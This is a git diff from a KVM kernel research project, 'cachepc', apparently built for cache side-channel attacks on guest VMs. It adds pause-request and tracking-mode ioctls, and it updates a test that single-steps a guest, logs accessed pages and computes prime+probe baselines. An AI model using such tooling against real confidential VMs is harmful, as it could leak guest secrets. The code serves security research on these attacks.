-cachepc_kvm_vm_resume_ioctl(void __user *arg_user)
+cachepc_kvm_ack_event_ioctl(void __user *arg_user)
{
uint64_t eventid;
@@ -747,11 +637,19 @@ cachepc_kvm_vm_resume_ioctl(void __user *arg_user)
if (copy_from_user(&eventid, arg_user, sizeof(eventid)))
return -EFAULT;
- cachepc_pause_vm = false;
-
return cachepc_handle_ack_event_ioctl(eventid);
}
+int
+cachepc_kvm_req_pause_ioctl(void __user *arg_user)
+{
+ if (arg_user) return -EINVAL;
+
+ cachepc_pause_vm = true;
+
+ return 0;
+}
+
long
cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg)
{
@@ -775,36 +673,28 @@ cachepc_kvm_ioctl(struct file *file, unsigned int ioctl, unsigned long arg)
return cachepc_kvm_calc_baseline_ioctl(arg_user);
case KVM_CPC_APPLY_BASELINE:
return cachepc_kvm_apply_baseline_ioctl(arg_user);
- // case KVM_CPC_SINGLE_STEP:
- // return cachepc_kvm_single_step_ioctl(arg_user);
case KVM_CPC_VMSA_READ:
return cachepc_kvm_vmsa_read_ioctl(arg_user);
case KVM_CPC_SVME_READ:
return cachepc_kvm_svme_read_ioctl(arg_user);
- case KVM_CPC_TRACK_MODE:
- return cachepc_kvm_track_mode_ioctl(arg_user);
- // case KVM_CPC_TRACK_PAGE:
- // return cachepc_kvm_track_page_ioctl(arg_user);
- // case KVM_CPC_TRACK_ALL:
- // return cachepc_kvm_track_all_ioctl(arg_user);
- // case KVM_CPC_UNTRACK_ALL:
- // return cachepc_kvm_untrack_all_ioctl(arg_user);
case KVM_CPC_RESET_TRACKING:
return cachepc_kvm_reset_tracking_ioctl(arg_user);
+ case KVM_CPC_TRACK_MODE:
+ return cachepc_kvm_track_mode_ioctl(arg_user);
case KVM_CPC_POLL_EVENT:
return cachepc_kvm_poll_event_ioctl(arg_user);
case KVM_CPC_ACK_EVENT:
return cachepc_kvm_ack_event_ioctl(arg_user);
+ // case KVM_CPC_TRACK_PAGE:
+ // return cachepc_kvm_track_page_ioctl(arg_user);
// case KVM_CPC_TRACK_RANGE_START:
// return cachepc_kvm_track_range_start_ioctl(arg_user);
// case KVM_CPC_TRACK_RANGE_END:
// return cachepc_kvm_track_range_end_ioctl(arg_user);
// case KVM_CPC_TRACK_EXEC_CUR:
// return cachepc_kvm_track_exec_cur_ioctl(arg_user);
- case KVM_CPC_VM_PAUSE:
- return cachepc_kvm_vm_pause_ioctl(arg_user);
- case KVM_CPC_VM_RESUME:
- return cachepc_kvm_vm_resume_ioctl(arg_user);
+ case KVM_CPC_VM_REQ_PAUSE:
+ return cachepc_kvm_req_pause_ioctl(arg_user);
default:
return kvm_arch_dev_ioctl(file, ioctl, arg);
}
@@ -827,9 +717,9 @@ cachepc_kvm_setup_test(void *p)
cachepc_kvm_system_setup();
- cachepc_kvm_prime_probe_test(NULL);
+ cachepc_kvm_prime_probe_test();
+ cachepc_kvm_stream_hwpf_test();
cachepc_kvm_single_eviction_test(NULL);
- cachepc_kvm_stream_hwpf_test(NULL);
exit:
put_cpu();
@@ -843,10 +733,11 @@ cachepc_kvm_init(void)
cachepc_ctx = NULL;
cachepc_ds = NULL;
- cachepc_retinst = 0;
cachepc_debug = false;
- cachepc_single_step = false;
+ cachepc_retinst = 0;
+ cachepc_singlestep = false;
+ cachepc_singlestep_reset = false;
cachepc_track_mode = CPC_TRACK_NONE;
cachepc_inst_fault_gfn = 0;
diff --git a/cachepc/uapi.h b/cachepc/uapi.h
@@ -33,8 +33,7 @@
#define KVM_CPC_POLL_EVENT _IOWR(KVMIO, 0x48, struct cpc_event)
#define KVM_CPC_ACK_EVENT _IOWR(KVMIO, 0x49, __u64)
-#define KVM_CPC_VM_PAUSE _IO(KVMIO, 0x50)
-#define KVM_CPC_VM_RESUME _IO(KVMIO, 0x51)
+#define KVM_CPC_VM_REQ_PAUSE _IO(KVMIO, 0x50)
enum {
CPC_EVENT_NONE,
@@ -51,6 +50,7 @@ enum {
enum {
CPC_TRACK_NONE,
+ CPC_TRACK_FAULT_NO_RUN,
CPC_TRACK_EXEC,
CPC_TRACK_FULL,
};
diff --git a/test/kvm-step.c b/test/kvm-step.c
@@ -112,15 +112,20 @@ main(int argc, const char **argv)
printf("VM start\n");
- ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
- if (ret < 0) err(1, "KVM_RUN");
+ do {
+ ret = ioctl(kvm.vcpufd, KVM_RUN, NULL);
+ if (ret < 0) err(1, "KVM_RUN");
+
+ if (kvm.run->exit_reason == KVM_EXIT_HLT)
+ printf("VM halt\n");
+ } while (kvm.run->exit_reason == KVM_EXIT_HLT);
printf("VM exit\n");
} else {
pin_process(0, SECONDARY_CORE, true);
- /* single step and log all accessed pages */
- arg = CPC_TRACK_FULL;
+ /* capture baseline by just letting it fault over and over */
+ arg = CPC_TRACK_FAULT_NO_RUN;
ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg);
if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE");
@@ -133,12 +138,24 @@ main(int argc, const char **argv)
/* run vm while baseline is calculated */
eventcnt = 0;
- while (eventcnt < 30) {
+ while (eventcnt < 50) {
eventcnt += monitor(&kvm, true);
}
- ret = ioctl(kvm_dev, KVM_CPC_VM_PAUSE, &event);
- if (ret) err(1, "ioctl KVM_CPC_VM_PAUSE");
+ ret = ioctl(kvm_dev, KVM_CPC_VM_REQ_PAUSE);
+ if (ret) err(1, "ioctl KVM_CPC_VM_REQ_PAUSE");
+
+ while (1) {
+ ret = ioctl(kvm_dev, KVM_CPC_POLL_EVENT, &event);
+ if (ret && errno == EAGAIN) continue;
+ if (ret) err(1, "ioctl KVM_CPC_POLL_EVENT");
+
+ if (event.type == CPC_EVENT_PAUSE) break;
+
+ printf("Skipping non-pause event..\n");
+ ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
+ if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
+ }
arg = false;
ret = ioctl(kvm_dev, KVM_CPC_CALC_BASELINE, &arg);
@@ -151,17 +168,22 @@ main(int argc, const char **argv)
print_counts(baseline);
printf("\n");
print_counts_raw(baseline);
- printf("\n");
+ printf("\n\n");
arg = true;
ret = ioctl(kvm_dev, KVM_CPC_APPLY_BASELINE, &arg);
if (ret) err(1, "ioctl KMV_CPC_APPLY_BASELINE");
- ret = ioctl(kvm_dev, KVM_CPC_VM_RESUME, &event.id);
- if (ret) err(1, "ioctl KVM_CPC_VM_RESUME");
+ /* single step and log all accessed pages */
+ arg = CPC_TRACK_FULL;
+ ret = ioctl(kvm_dev, KVM_CPC_TRACK_MODE, &arg);
+ if (ret) err(1, "ioctl KVM_CPC_TRACK_MODE");
+
+ ret = ioctl(kvm_dev, KVM_CPC_ACK_EVENT, &event.id);
+ if (ret) err(1, "ioctl KVM_CPC_ACK_EVENT");
eventcnt = 0;
- while (eventcnt < 30) {
+ while (eventcnt < 50) {
eventcnt += monitor(&kvm, false);
}
diff --git a/test/kvm-step_guest.S b/test/kvm-step_guest.S
@@ -6,13 +6,17 @@
.global guest_stop
guest_start:
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
- mov $(L1_LINESIZE * (L1_SETS + TARGET_SET)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 9)), %rbx
+# hlt
+# mov $(L1_LINESIZE * (L1_SETS + 10)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 11)), %rbx
+# hlt
+# mov $(L1_LINESIZE * (L1_SETS + 12)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 13)), %rbx
+# hlt
+# mov $(L1_LINESIZE * (L1_SETS + 14)), %rbx
+ mov $(L1_LINESIZE * (L1_SETS + 15)), %rbx
+ hlt
jmp guest_start
guest_stop: